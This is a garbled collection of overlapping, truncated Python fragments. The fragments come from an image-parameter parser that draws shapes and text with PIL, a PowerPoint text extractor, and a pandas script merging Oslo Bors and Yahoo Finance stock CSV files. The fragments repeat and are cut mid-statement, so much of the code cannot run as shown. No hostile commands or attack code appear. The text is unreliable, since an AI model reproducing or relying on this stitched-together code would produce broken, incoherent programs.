bg_args else: return None def point(obj): return None if not", "= text(obj) params['store'] = store(obj) params['point'] = point(obj) params['opacity'] = 
opacity(obj) params['original'] =", "None if not obj.get('point') else float(obj.get('point')) def size(obj): width = int(obj.get('width') or obj.get('w')", "rgb[1] = rgb[1] if not obj.get('g') else obj.get('g') rgb[2] = rgb[2] if not", "(op := int(a)) <= 255 else None return None def album(obj): data =", "rgb[2] if not obj.get('b') else obj.get('b') return int(rgb[0]), int(rgb[1]), int(rgb[2]) def line(obj): lines", ">= 7: return [int(data[0]), (int(data[1]), int(data[2]), int(data[3])), (int(data[4]), int(data[5]), int(data[6]))] return None def", "return shapes def text(obj): texts = list() if texts_args := obj.get('texts'): text_args =", "text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, int(text_arg[6]))]) elif len(text_arg) >= 6: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2],", "i.split(',') if len(text_arg) >= 7: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, int(text_arg[6]))])", "(o := obj.get('original')) else False params['colour'] = colour(obj) params['album'] = album(obj) return params", "int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (0, 0, 0)]) elif len(shape_arg) >= 4:", ">= 1: bg_args = [bg[0], '0'] return bg_args else: return None def point(obj):", "texts = list() if texts_args := obj.get('texts'): text_args = texts_args.split(';') # ttf =", "or '300') return width, height def color(obj): rgb = (obj.get('rgb') or '200,200,200').split(',') rgb[0]", ":= obj.get('lines'): line_args = lines_args.split(';') for i in line_args: try: line_arg = i.split(',')", "return None def store(obj): bg = None if not obj.get('store') else obj.get('store').split(',') if", "bg_args if len(bg) >= 1: bg_args = [bg[0], '0'] return bg_args else: return", "0)]) except Exception as ex: print(str(ex)) return lines def ellipse_and_rectangle(obj, 
shape): shapes =", "color(obj) params['lines'] = line(obj) params['ellipses'] = ellipse_and_rectangle(obj, 'ellipses') params['rectangles'] = ellipse_and_rectangle(obj, 'rectangles') params['texts']", "int(line_arg[2]), int(line_arg[3])), (0, 0, 0)]) except Exception as ex: print(str(ex)) return lines def", "0 <= (op := int(a)) <= 255 else None return None def album(obj):", "len(bg) >= 1: bg_args = [bg[0], '0'] return bg_args else: return None def", "for i in line_args: try: line_arg = i.split(',') if len(line_arg) >= 7: lines.append([(int(line_arg[0]),", "int(line_arg[3])), (int(line_arg[4]), int(line_arg[5]), int(line_arg[6]))]) elif len(line_arg) >= 4: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (0,", "obj.get('b') return int(rgb[0]), int(rgb[1]), int(rgb[2]) def line(obj): lines = list() if lines_args :=", "int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (int(line_arg[4]), int(line_arg[5]), int(line_arg[6]))]) elif len(line_arg) >= 4: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]),", "int(shape_arg[9]))]) elif len(shape_arg) >= 7: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])),", "if 0 <= (op := int(a)) <= 255 else None return None def", "Exception as ex: print(str(ex)) return lines def ellipse_and_rectangle(obj, shape): shapes = list() if", "else None if data and len(data) >= 7: return [int(data[0]), (int(data[1]), int(data[2]), int(data[3])),", "params['texts'] = text(obj) params['store'] = store(obj) params['point'] = point(obj) params['opacity'] = opacity(obj) params['original']", "height def color(obj): rgb = (obj.get('rgb') or '200,200,200').split(',') rgb[0] = rgb[0] if not", "<= 255 else None return None def album(obj): data = params.split(',') if (params", "1: bg_args = [bg[0], '0'] return bg_args else: return None def point(obj): return", "int(shape_arg[6])), 
(int(shape_arg[7]), int(shape_arg[8]), int(shape_arg[9]))]) elif len(shape_arg) >= 7: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])),", "bg[1]] return bg_args if len(bg) >= 1: bg_args = [bg[0], '0'] return bg_args", "texts_args := obj.get('texts'): text_args = texts_args.split(';') # ttf = '/home/ahri/code/AhriImage/Image/font.ttf' ttf = '/project/Image/font.ttf'", "store(obj): bg = None if not obj.get('store') else obj.get('store').split(',') if bg: if len(bg)", "colour(obj): data = params.split(',') if (params := obj.get('colour')) else None if data and", "len(shape_arg) >= 4: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (0, 0, 0), (0, 0,", "rgb[0] if not obj.get('r') else obj.get('r') rgb[1] = rgb[1] if not obj.get('g') else", "shape_args = shapes_args.split(';') for i in shape_args: try: shape_arg = i.split(',') if len(shape_arg)", "in line_args: try: line_arg = i.split(',') if len(line_arg) >= 7: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]),", "text(obj): texts = list() if texts_args := obj.get('texts'): text_args = texts_args.split(';') # ttf", "None if data and len(data) >= 2: return [data[0], data[1]] return None def", "len(bg) >= 2: bg_args = [bg[0], bg[1]] return bg_args if len(bg) >= 1:", "def album(obj): data = params.split(',') if (params := obj.get('album')) else None if data", "or '400') height = int(obj.get('height') or obj.get('h') or '300') return width, height def", "line(obj): lines = list() if lines_args := obj.get('lines'): line_args = lines_args.split(';') for i", "int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (int(shape_arg[7]), int(shape_arg[8]), int(shape_arg[9]))]) elif len(shape_arg) >= 7: shapes.append( [(int(shape_arg[0]),", "return op if 0 <= (op := int(a)) <= 255 else None return", "if len(bg) >= 2: bg_args = [bg[0], bg[1]] return bg_args if len(bg) >=", "ellipse_and_rectangle(obj, 
shape): shapes = list() if shapes_args := obj.get(shape): shape_args = shapes_args.split(';') for", "(0, 0, 0)]) except Exception as ex: print(str(ex)) return shapes def text(obj): texts", "int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (0, 0, 0), (0, 0, 0)]) except Exception as ex:", "shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (0, 0, 0)]) elif len(shape_arg)", "if not obj.get('b') else obj.get('b') return int(rgb[0]), int(rgb[1]), int(rgb[2]) def line(obj): lines =", "int(rgb[0]), int(rgb[1]), int(rgb[2]) def line(obj): lines = list() if lines_args := obj.get('lines'): line_args", "obj.get('g') rgb[2] = rgb[2] if not obj.get('b') else obj.get('b') return int(rgb[0]), int(rgb[1]), int(rgb[2])", "rgb[2] = rgb[2] if not obj.get('b') else obj.get('b') return int(rgb[0]), int(rgb[1]), int(rgb[2]) def", "= list() if shapes_args := obj.get(shape): shape_args = shapes_args.split(';') for i in shape_args:", "= colour(obj) params['album'] = album(obj) return params def opacity(obj): if a := o", "int(data[3])), (int(data[4]), int(data[5]), int(data[6]))] return None def store(obj): bg = None if not", "not obj.get('point') else float(obj.get('point')) def size(obj): width = int(obj.get('width') or obj.get('w') or '400')", "obj.get('original')) else False params['colour'] = colour(obj) params['album'] = album(obj) return params def opacity(obj):", "return None if not obj.get('point') else float(obj.get('point')) def size(obj): width = int(obj.get('width') or", "= '/project/Image/font.ttf' for i in text_args: text_arg = i.split(',') if len(text_arg) >= 7:", "len(text_arg) >= 6: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, 30)]) if len(text_args)", "return lines def ellipse_and_rectangle(obj, shape): shapes = list() if shapes_args := obj.get(shape): shape_args", 
"o if (o := obj.get('a')) else None: return op if 0 <= (op", "i in shape_args: try: shape_arg = i.split(',') if len(shape_arg) >= 10: shapes.append( [(int(shape_arg[0]),", "print(str(ex)) return shapes def text(obj): texts = list() if texts_args := obj.get('texts'): text_args", "def opacity(obj): if a := o if (o := obj.get('a')) else None: return", "= texts_args.split(';') # ttf = '/home/ahri/code/AhriImage/Image/font.ttf' ttf = '/project/Image/font.ttf' for i in text_args:", "None return None def album(obj): data = params.split(',') if (params := obj.get('album')) else", "return None def point(obj): return None if not obj.get('point') else float(obj.get('point')) def size(obj):", "i in text_args: text_arg = i.split(',') if len(text_arg) >= 7: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2],", "int(shape_arg[8]), int(shape_arg[9]))]) elif len(shape_arg) >= 7: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]),", "obj.get('h') or '300') return width, height def color(obj): rgb = (obj.get('rgb') or '200,200,200').split(',')", "params['colour'] = colour(obj) params['album'] = album(obj) return params def opacity(obj): if a :=", "else: return None def point(obj): return None if not obj.get('point') else float(obj.get('point')) def", "[bg[0], bg[1]] return bg_args if len(bg) >= 1: bg_args = [bg[0], '0'] return", ":= obj.get('colour')) else None if data and len(data) >= 7: return [int(data[0]), (int(data[1]),", "= line(obj) params['ellipses'] = ellipse_and_rectangle(obj, 'ellipses') params['rectangles'] = ellipse_and_rectangle(obj, 'rectangles') params['texts'] = text(obj)", "0, 0)]) except Exception as ex: print(str(ex)) return lines def ellipse_and_rectangle(obj, shape): shapes", "in shape_args: try: shape_arg = i.split(',') if len(shape_arg) >= 10: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]),", "else obj.get('store').split(',') if bg: if len(bg) >= 2: bg_args = 
[bg[0], bg[1]] return", "elif len(shape_arg) >= 7: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (0,", "size(obj): width = int(obj.get('width') or obj.get('w') or '400') height = int(obj.get('height') or obj.get('h')", "0)]) elif len(shape_arg) >= 4: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (0, 0, 0),", "int(a)) <= 255 else None return None def album(obj): data = params.split(',') if", "and len(data) >= 7: return [int(data[0]), (int(data[1]), int(data[2]), int(data[3])), (int(data[4]), int(data[5]), int(data[6]))] return", "elif len(shape_arg) >= 4: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (0, 0, 0), (0,", "= album(obj) return params def opacity(obj): if a := o if (o :=", "'/project/Image/font.ttf' for i in text_args: text_arg = i.split(',') if len(text_arg) >= 7: texts.append([(int(text_arg[0]),", "0, 0), (0, 0, 0)]) except Exception as ex: print(str(ex)) return shapes def", "<= (op := int(a)) <= 255 else None return None def album(obj): data", "params.split(',') if (params := obj.get('album')) else None if data and len(data) >= 2:", "rgb[0] = rgb[0] if not obj.get('r') else obj.get('r') rgb[1] = rgb[1] if not", "params['album'] = album(obj) return params def opacity(obj): if a := o if (o", "int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, int(text_arg[6]))]) elif len(text_arg) >= 6: texts.append([(int(text_arg[0]), int(text_arg[1])),", "= o if (o := obj.get('original')) else False params['colour'] = colour(obj) params['album'] =", "not obj.get('r') else obj.get('r') rgb[1] = rgb[1] if not obj.get('g') else obj.get('g') rgb[2]", "int(rgb[2]) def line(obj): lines = list() if lines_args := obj.get('lines'): line_args = lines_args.split(';')", "not obj.get('g') else obj.get('g') rgb[2] = rgb[2] 
if not obj.get('b') else obj.get('b') return", "= params.split(',') if (params := obj.get('colour')) else None if data and len(data) >=", "else float(obj.get('point')) def size(obj): width = int(obj.get('width') or obj.get('w') or '400') height =", "bg: if len(bg) >= 2: bg_args = [bg[0], bg[1]] return bg_args if len(bg)", "or obj.get('w') or '400') height = int(obj.get('height') or obj.get('h') or '300') return width,", ">= 4: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (0, 0, 0)]) except Exception as ex:", "else obj.get('r') rgb[1] = rgb[1] if not obj.get('g') else obj.get('g') rgb[2] = rgb[2]", "int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, int(text_arg[6]))]) elif len(text_arg) >= 6: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]),", "int(data[2]), int(data[3])), (int(data[4]), int(data[5]), int(data[6]))] return None def store(obj): bg = None if", "list() if lines_args := obj.get('lines'): line_args = lines_args.split(';') for i in line_args: try:", "= i.split(',') if len(line_arg) >= 7: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (int(line_arg[4]), int(line_arg[5]), int(line_arg[6]))])", "lines def ellipse_and_rectangle(obj, shape): shapes = list() if shapes_args := obj.get(shape): shape_args =", "int(shape_arg[5]), int(shape_arg[6])), (int(shape_arg[7]), int(shape_arg[8]), int(shape_arg[9]))]) elif len(shape_arg) >= 7: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]),", "as ex: print(str(ex)) return lines def ellipse_and_rectangle(obj, shape): shapes = list() if shapes_args", "int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, 30)]) if len(text_args) >= 3: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (0, 0,", "point(obj): return None if not obj.get('point') else float(obj.get('point')) def size(obj): width = int(obj.get('width')", "int(shape_arg[1]), 
int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (int(shape_arg[7]), int(shape_arg[8]), int(shape_arg[9]))]) elif len(shape_arg) >= 7:", "(int(data[1]), int(data[2]), int(data[3])), (int(data[4]), int(data[5]), int(data[6]))] return None def store(obj): bg = None", "shape_arg = i.split(',') if len(shape_arg) >= 10: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]),", "ellipse_and_rectangle(obj, 'rectangles') params['texts'] = text(obj) params['store'] = store(obj) params['point'] = point(obj) params['opacity'] =", "not obj.get('b') else obj.get('b') return int(rgb[0]), int(rgb[1]), int(rgb[2]) def line(obj): lines = list()", "i.split(',') if len(line_arg) >= 7: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (int(line_arg[4]), int(line_arg[5]), int(line_arg[6]))]) elif", "text(obj) params['store'] = store(obj) params['point'] = point(obj) params['opacity'] = opacity(obj) params['original'] = o", "texts_args.split(';') # ttf = '/home/ahri/code/AhriImage/Image/font.ttf' ttf = '/project/Image/font.ttf' for i in text_args: text_arg", "= params.split(',') if (params := obj.get('album')) else None if data and len(data) >=", "= shapes_args.split(';') for i in shape_args: try: shape_arg = i.split(',') if len(shape_arg) >=", "params = dict() params['size'] = size(obj) params['rgb'] = color(obj) params['lines'] = line(obj) params['ellipses']", "if shapes_args := obj.get(shape): shape_args = shapes_args.split(';') for i in shape_args: try: shape_arg", "None def colour(obj): data = params.split(',') if (params := obj.get('colour')) else None if", "7: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (0, 0, 0)]) elif", "color(obj): rgb = (obj.get('rgb') or '200,200,200').split(',') rgb[0] = rgb[0] if not obj.get('r') else", "if 
len(text_arg) >= 7: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, int(text_arg[6]))]) elif", "(obj.get('rgb') or '200,200,200').split(',') rgb[0] = rgb[0] if not obj.get('r') else obj.get('r') rgb[1] =", "(int(shape_arg[7]), int(shape_arg[8]), int(shape_arg[9]))]) elif len(shape_arg) >= 7: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]),", "(o := obj.get('a')) else None: return op if 0 <= (op := int(a))", "shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (0, 0, 0), (0, 0, 0)]) except Exception", "int(text_arg[5])), ImageFont.truetype(ttf, 30)]) if len(text_args) >= 3: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (0, 0, 0),", "0)]) except Exception as ex: print(str(ex)) return shapes def text(obj): texts = list()", "[(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (0, 0, 0), (0, 0, 0)]) except Exception as", "int(data[5]), int(data[6]))] return None def store(obj): bg = None if not obj.get('store') else", "shapes_args := obj.get(shape): shape_args = shapes_args.split(';') for i in shape_args: try: shape_arg =", "int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, 30)]) if len(text_args) >= 3: texts.append([(int(text_arg[0]), int(text_arg[1])),", "if (params := obj.get('colour')) else None if data and len(data) >= 7: return", "if len(bg) >= 1: bg_args = [bg[0], '0'] return bg_args else: return None", "int(line_arg[3])), (0, 0, 0)]) except Exception as ex: print(str(ex)) return lines def ellipse_and_rectangle(obj,", "if not obj.get('point') else float(obj.get('point')) def size(obj): width = int(obj.get('width') or obj.get('w') or", "width = int(obj.get('width') or obj.get('w') or '400') height = int(obj.get('height') or obj.get('h') or", 
"params.split(',') if (params := obj.get('colour')) else None if data and len(data) >= 7:", "len(text_arg) >= 7: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, int(text_arg[6]))]) elif len(text_arg)", "30)]) if len(text_args) >= 3: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (0, 0, 0), ImageFont.truetype(ttf, 30)])", "6: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, 30)]) if len(text_args) >= 3:", "= ellipse_and_rectangle(obj, 'ellipses') params['rectangles'] = ellipse_and_rectangle(obj, 'rectangles') params['texts'] = text(obj) params['store'] = store(obj)", "line_args = lines_args.split(';') for i in line_args: try: line_arg = i.split(',') if len(line_arg)", "shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (int(shape_arg[7]), int(shape_arg[8]), int(shape_arg[9]))]) elif len(shape_arg)", "obj.get('b') else obj.get('b') return int(rgb[0]), int(rgb[1]), int(rgb[2]) def line(obj): lines = list() if", "store(obj) params['point'] = point(obj) params['opacity'] = opacity(obj) params['original'] = o if (o :=", "lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (int(line_arg[4]), int(line_arg[5]), int(line_arg[6]))]) elif len(line_arg) >= 4: lines.append([(int(line_arg[0]), int(line_arg[1]),", "line_arg = i.split(',') if len(line_arg) >= 7: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (int(line_arg[4]), int(line_arg[5]),", "lines_args.split(';') for i in line_args: try: line_arg = i.split(',') if len(line_arg) >= 7:", "text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, 30)]) if len(text_args) >= 3: texts.append([(int(text_arg[0]), 
int(text_arg[1])), text_arg[2],", "0), (0, 0, 0)]) except Exception as ex: print(str(ex)) return shapes def text(obj):", "ImageFont def analysis(obj): params = dict() params['size'] = size(obj) params['rgb'] = color(obj) params['lines']", "[(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (int(shape_arg[7]), int(shape_arg[8]), int(shape_arg[9]))]) elif len(shape_arg) >=", "lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (0, 0, 0)]) except Exception as ex: print(str(ex)) return", "len(shape_arg) >= 10: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (int(shape_arg[7]), int(shape_arg[8]),", "return bg_args else: return None def point(obj): return None if not obj.get('point') else", "obj.get('colour')) else None if data and len(data) >= 7: return [int(data[0]), (int(data[1]), int(data[2]),", "if len(line_arg) >= 7: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (int(line_arg[4]), int(line_arg[5]), int(line_arg[6]))]) elif len(line_arg)" ]
[ "shape in slide.shapes: if shape.has_text_frame: print(shape.text_frame.text) if shape.has_table: for cell in shape.table.iter_cells(): print(cell.text)", "for slide in p.slides: for shape in slide.shapes: if shape.has_text_frame: print(shape.text_frame.text) if shape.has_table:", "p = Presentation('a.pptx') for slide in p.slides: for shape in slide.shapes: if shape.has_text_frame:", "Presentation p = Presentation('a.pptx') for slide in p.slides: for shape in slide.shapes: if", "import Presentation p = Presentation('a.pptx') for slide in p.slides: for shape in slide.shapes:", "Presentation('a.pptx') for slide in p.slides: for shape in slide.shapes: if shape.has_text_frame: print(shape.text_frame.text) if", "from pptx import Presentation p = Presentation('a.pptx') for slide in p.slides: for shape", "= Presentation('a.pptx') for slide in p.slides: for shape in slide.shapes: if shape.has_text_frame: print(shape.text_frame.text)", "in p.slides: for shape in slide.shapes: if shape.has_text_frame: print(shape.text_frame.text) if shape.has_table: for cell", "p.slides: for shape in slide.shapes: if shape.has_text_frame: print(shape.text_frame.text) if shape.has_table: for cell in", "slide in p.slides: for shape in slide.shapes: if shape.has_text_frame: print(shape.text_frame.text) if shape.has_table: for", "for shape in slide.shapes: if shape.has_text_frame: print(shape.text_frame.text) if shape.has_table: for cell in shape.table.iter_cells():", "<filename>pythonoffice/ppt_get.py<gh_stars>1-10 from pptx import Presentation p = Presentation('a.pptx') for slide in p.slides: for", "pptx import Presentation p = Presentation('a.pptx') for slide in p.slides: for shape in" ]
[ "the ones # that are not so sparse and that I FEEL makes", "picking the ones # that are not so sparse and that I FEEL", "bors and yahoo data''' import numpy as np import pandas as pd from", "sense to include. df_stats = df_stats[cng.SELECTED_FEATURES] df_combined = pd.merge(df_bors, df_stats, on=cng.MERGE_DFS_ON) df_combined.set_index(cng.MERGE_DFS_ON, inplace=True)", "include. df_stats = df_stats[cng.SELECTED_FEATURES] df_combined = pd.merge(df_bors, df_stats, on=cng.MERGE_DFS_ON) df_combined.set_index(cng.MERGE_DFS_ON, inplace=True) df_combined.to_csv(cng.FINALDATASET_FILENAME) if", "are not so sparse and that I FEEL makes # makes sense to", "merges them to one large dataset. ''' df_bors = pd.read_csv(bors_name) df_stats = pd.read_csv(yahoo_name)", "yahoo_name: str, result_filename: str): ''' Get filenames for csv files from Oslo Bors", "str): ''' Get filenames for csv files from Oslo Bors and Yahoo Finance", "Finance and merges them to one large dataset. ''' df_bors = pd.read_csv(bors_name) df_stats", "df_combined = pd.merge(df_bors, df_stats, on=cng.MERGE_DFS_ON) df_combined.set_index(cng.MERGE_DFS_ON, inplace=True) df_combined.to_csv(cng.FINALDATASET_FILENAME) if __name__ == '__main__': merge_bors_and_yahoo_dfs(cng.BORS_CSV_NAME,", "# Some of the features from Yahoo Finance # are very sparse, so", "''' df_bors = pd.read_csv(bors_name) df_stats = pd.read_csv(yahoo_name) # Some of the features from", "oslo bors and yahoo data''' import numpy as np import pandas as pd", "I FEEL makes # makes sense to include. df_stats = df_stats[cng.SELECTED_FEATURES] df_combined =", "pprint import pprint import scrapeconfig as cng def merge_bors_and_yahoo_dfs(bors_name: str, yahoo_name: str, result_filename:", "to include. 
df_stats = df_stats[cng.SELECTED_FEATURES] df_combined = pd.merge(df_bors, df_stats, on=cng.MERGE_DFS_ON) df_combined.set_index(cng.MERGE_DFS_ON, inplace=True) df_combined.to_csv(cng.FINALDATASET_FILENAME)", "df_stats = df_stats[cng.SELECTED_FEATURES] df_combined = pd.merge(df_bors, df_stats, on=cng.MERGE_DFS_ON) df_combined.set_index(cng.MERGE_DFS_ON, inplace=True) df_combined.to_csv(cng.FINALDATASET_FILENAME) if __name__", "import pandas as pd from pprint import pprint import scrapeconfig as cng def", "yahoo data''' import numpy as np import pandas as pd from pprint import", "from Yahoo Finance # are very sparse, so here I am picking the", "pd from pprint import pprint import scrapeconfig as cng def merge_bors_and_yahoo_dfs(bors_name: str, yahoo_name:", "'''Combines oslo bors and yahoo data''' import numpy as np import pandas as", "Finance # are very sparse, so here I am picking the ones #", "for csv files from Oslo Bors and Yahoo Finance and merges them to", "Some of the features from Yahoo Finance # are very sparse, so here", "that I FEEL makes # makes sense to include. df_stats = df_stats[cng.SELECTED_FEATURES] df_combined", "of the features from Yahoo Finance # are very sparse, so here I", "merge_bors_and_yahoo_dfs(bors_name: str, yahoo_name: str, result_filename: str): ''' Get filenames for csv files from", "def merge_bors_and_yahoo_dfs(bors_name: str, yahoo_name: str, result_filename: str): ''' Get filenames for csv files", "dataset. ''' df_bors = pd.read_csv(bors_name) df_stats = pd.read_csv(yahoo_name) # Some of the features", "files from Oslo Bors and Yahoo Finance and merges them to one large", "Oslo Bors and Yahoo Finance and merges them to one large dataset. '''", "= pd.read_csv(bors_name) df_stats = pd.read_csv(yahoo_name) # Some of the features from Yahoo Finance", "not so sparse and that I FEEL makes # makes sense to include.", "# makes sense to include. 
df_stats = df_stats[cng.SELECTED_FEATURES] df_combined = pd.merge(df_bors, df_stats, on=cng.MERGE_DFS_ON)", "here I am picking the ones # that are not so sparse and", "the features from Yahoo Finance # are very sparse, so here I am", "cng def merge_bors_and_yahoo_dfs(bors_name: str, yahoo_name: str, result_filename: str): ''' Get filenames for csv", "import scrapeconfig as cng def merge_bors_and_yahoo_dfs(bors_name: str, yahoo_name: str, result_filename: str): ''' Get", "that are not so sparse and that I FEEL makes # makes sense", "sparse and that I FEEL makes # makes sense to include. df_stats =", "filenames for csv files from Oslo Bors and Yahoo Finance and merges them", "am picking the ones # that are not so sparse and that I", "scrapeconfig as cng def merge_bors_and_yahoo_dfs(bors_name: str, yahoo_name: str, result_filename: str): ''' Get filenames", "df_stats = pd.read_csv(yahoo_name) # Some of the features from Yahoo Finance # are", "makes sense to include. df_stats = df_stats[cng.SELECTED_FEATURES] df_combined = pd.merge(df_bors, df_stats, on=cng.MERGE_DFS_ON) df_combined.set_index(cng.MERGE_DFS_ON,", "str, result_filename: str): ''' Get filenames for csv files from Oslo Bors and", "makes # makes sense to include. 
df_stats = df_stats[cng.SELECTED_FEATURES] df_combined = pd.merge(df_bors, df_stats,", "import numpy as np import pandas as pd from pprint import pprint import", "data''' import numpy as np import pandas as pd from pprint import pprint", "sparse, so here I am picking the ones # that are not so", "pprint import scrapeconfig as cng def merge_bors_and_yahoo_dfs(bors_name: str, yahoo_name: str, result_filename: str): '''", "as np import pandas as pd from pprint import pprint import scrapeconfig as", "and yahoo data''' import numpy as np import pandas as pd from pprint", "so here I am picking the ones # that are not so sparse", "csv files from Oslo Bors and Yahoo Finance and merges them to one", "pandas as pd from pprint import pprint import scrapeconfig as cng def merge_bors_and_yahoo_dfs(bors_name:", "them to one large dataset. ''' df_bors = pd.read_csv(bors_name) df_stats = pd.read_csv(yahoo_name) #", "numpy as np import pandas as pd from pprint import pprint import scrapeconfig", "and Yahoo Finance and merges them to one large dataset. ''' df_bors =", "from Oslo Bors and Yahoo Finance and merges them to one large dataset.", "so sparse and that I FEEL makes # makes sense to include. df_stats", "np import pandas as pd from pprint import pprint import scrapeconfig as cng", "and that I FEEL makes # makes sense to include. df_stats = df_stats[cng.SELECTED_FEATURES]", "pd.read_csv(bors_name) df_stats = pd.read_csv(yahoo_name) # Some of the features from Yahoo Finance #", "to one large dataset. ''' df_bors = pd.read_csv(bors_name) df_stats = pd.read_csv(yahoo_name) # Some", "result_filename: str): ''' Get filenames for csv files from Oslo Bors and Yahoo", "# that are not so sparse and that I FEEL makes # makes", "''' Get filenames for csv files from Oslo Bors and Yahoo Finance and", "large dataset. ''' df_bors = pd.read_csv(bors_name) df_stats = pd.read_csv(yahoo_name) # Some of the", "Bors and Yahoo Finance and merges them to one large dataset. 
''' df_bors", "from pprint import pprint import scrapeconfig as cng def merge_bors_and_yahoo_dfs(bors_name: str, yahoo_name: str,", "df_stats[cng.SELECTED_FEATURES] df_combined = pd.merge(df_bors, df_stats, on=cng.MERGE_DFS_ON) df_combined.set_index(cng.MERGE_DFS_ON, inplace=True) df_combined.to_csv(cng.FINALDATASET_FILENAME) if __name__ == '__main__':", "and merges them to one large dataset. ''' df_bors = pd.read_csv(bors_name) df_stats =", "ones # that are not so sparse and that I FEEL makes #", "are very sparse, so here I am picking the ones # that are", "as pd from pprint import pprint import scrapeconfig as cng def merge_bors_and_yahoo_dfs(bors_name: str,", "Get filenames for csv files from Oslo Bors and Yahoo Finance and merges", "= pd.merge(df_bors, df_stats, on=cng.MERGE_DFS_ON) df_combined.set_index(cng.MERGE_DFS_ON, inplace=True) df_combined.to_csv(cng.FINALDATASET_FILENAME) if __name__ == '__main__': merge_bors_and_yahoo_dfs(cng.BORS_CSV_NAME, cng.YAHOO_CSV_NAME,", "= pd.read_csv(yahoo_name) # Some of the features from Yahoo Finance # are very", "one large dataset. ''' df_bors = pd.read_csv(bors_name) df_stats = pd.read_csv(yahoo_name) # Some of", "pd.merge(df_bors, df_stats, on=cng.MERGE_DFS_ON) df_combined.set_index(cng.MERGE_DFS_ON, inplace=True) df_combined.to_csv(cng.FINALDATASET_FILENAME) if __name__ == '__main__': merge_bors_and_yahoo_dfs(cng.BORS_CSV_NAME, cng.YAHOO_CSV_NAME, cng.FINALDATASET_FILENAME)", 